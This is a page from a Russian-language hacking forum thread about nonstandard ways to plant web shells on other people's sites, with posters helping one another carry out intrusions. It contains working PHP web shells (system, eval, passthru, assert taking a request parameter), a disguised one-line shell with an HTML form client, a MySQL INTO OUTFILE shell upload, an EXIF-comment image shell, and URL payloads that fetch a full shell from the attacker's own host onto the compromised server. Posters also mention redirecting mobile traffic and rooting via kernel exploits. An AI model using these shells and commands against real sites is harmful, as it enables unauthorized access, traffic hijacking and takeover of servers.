Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. Jopashnik

    Jopashnik New Member

    Joined:
    27 Oct 2010
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    скажите залил wso2 шелл, но править .htaccess файл не дает. что можно сделать?? нужно поправить .htaccess для перекачки моб.трафа??
    Права 0644
     
    #81 Jopashnik, 28 Jan 2012
    Last edited: 28 Jan 2012
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    права на файл какие? если не дает я так думаю что прав нет, смотри на ядро..ищи сплоит, рутай----> профит
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Открой .htaccess. Скопируй содержимое. Переименуй на 1.htaccess. Создай файл .htaccess, а туда уже Ctrl+V => Свой код => Save => PROFIT!!!11
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    за то assert выручает)))

    P.S: На мой взгляд самое оптимальное прятать шел что нить в таком формате <? $_POST['login']($_POST['action']); ?> и написать под нее какой нит скриптик, который в принцепи по логике можно использовать как полноценный шелл (клиентскую часть)...
     
    _________________________
    #84 winstrool, 31 Jan 2012
    Last edited: 31 Jan 2012
  5. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    А вот и скриптик на html :D
    HTML:
    <form action="Путь_к_файлу_с_этим_кодом" method=POST>
    Команда: <input type=text size=40 name=login><br>
    Значение: <input type=text size=40 name=action><br>
    </form>
    Там где команда например system, а там где значение соответственно ls и тп...
    также можно radio кнопки заюзать ;)

    Ну или юзать GET...
     
  6. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Че вы напали на парня? Все такие умные шо пздц, напишите сами статьи, а потом критикуйте.
    Молодец что написал статью, многим будет полезна.
    Будьте проще.
    Peace.
     
  7. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Такие уж тут законы.. это можно сразу понять. Сидят жирные тролли и критикуют. Вот и весь форум.
     
  8. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Ну я бы так не сказал. Есть еще и такая вещь, как конструктивная критика, или просто дополнениие ;)
     
    _________________________
  9. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Верно, но действует это далеко не всегда (тут).. Впрочем, не будем оффтопить ;)
     
  10. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    Расскажите по подробней способ заливки шелла через MySQL injection. Спасибо.
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    PHP:
    select 'код мини шела' into outfile '/путь относительно корня сайта/shel.php'
    данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются...

    также директория куда будет литься шелл должна быть разрешена для запеси.
     
    _________________________
  12. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    также для проверки привилегий "по быстрому" рекомендую просто залить в папку /tmp/ если льётся - то права есть)
     
  13. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    стандартные подливки.
     
  14. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    какой кул хакер нашёлся
     
  15. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Большое спасибо за статью. Все те разрозненные наборы информации, что по крупицам приходилось гуглить, собрано здесь, в одном месте. Статья помогла найти ответы на некоторые вопросы, которые вроде и лежат на поверхности, но вот осознать их получилось только с конкретными примерами синктаксиса в коде, которые можно с удовольствием наблюдать тут.

    Пиши есчо)
     
  16. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Спасибо :)
     
    #96 Osstudio, 9 Mar 2012
    Last edited: 11 Mar 2012
  17. Alex2103

    Alex2103 New Member

    Joined:
    6 Mar 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    подскажите всё делаю как тут написано
    8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
    Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
    Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть <?php eval($_GET[cmd]); ?>, сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
    Подробнее тут


    делаю фото 123.jpg
    закачиваю на сайт
    скрипт сайта меняет ему название но коменты оттаются
    меняет на 3973819_77116-32x32x.jpg
    прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo()
    так как картинка была так и остаётся


    и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo()
    вообще ошибка вылезает

    что я не так делаю ?
     
    #97 Alex2103, 11 Mar 2012
    Last edited: 11 Mar 2012
  18. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    какая ошибка?

    возможно вы забыли ; после phpinfo()
     
    _________________________
  19. Alex2103

    Alex2103 New Member

    Joined:
    6 Mar 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    ошибка

    Access forbidden!

    You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.

    If you think this is a server error, please contact the webmaster.

    Error 403

    site.ru
    Sun Mar 11 02:02:31 2012
    Apache/2.2.21 (FreeBSD) PHP/5.3.5 with Suhosin-Patch

    Я ещё новичок в этом

    а что я там забыл ???

    ребят ответе, навидите на путь истенный ))))
     
    #99 Alex2103, 11 Mar 2012
    Last edited: 11 Mar 2012
  20. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.

    И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:

    PHP:
    <?system($_GET[cmd])?> 
    PHP:
    <?eval($_GET[cmd])?>
    PHP:
    <?passthru($_GET[cmd])?>
    PHP:
    <?eval($_REQUEST[cmd])?>
    PHP:
     <?passthru($_REQUEST[cmd])?>
    PHP:
    <?system($_REQUEST[cmd])?>
    PHP:
    <?assert($_GET[cmd])?>
    Например мы залили <?system($_GET[cmd])?>, тогда
    PHP:
    http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;
    // Узнаем "качалку", если fetch, то

    PHP:
    http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php
    // Заливаем полноценный шелл

    Если мы залили <?assert($_GET[cmd])?>, то
    PHP:
    http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");
    Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".

    Как-то так, в общем.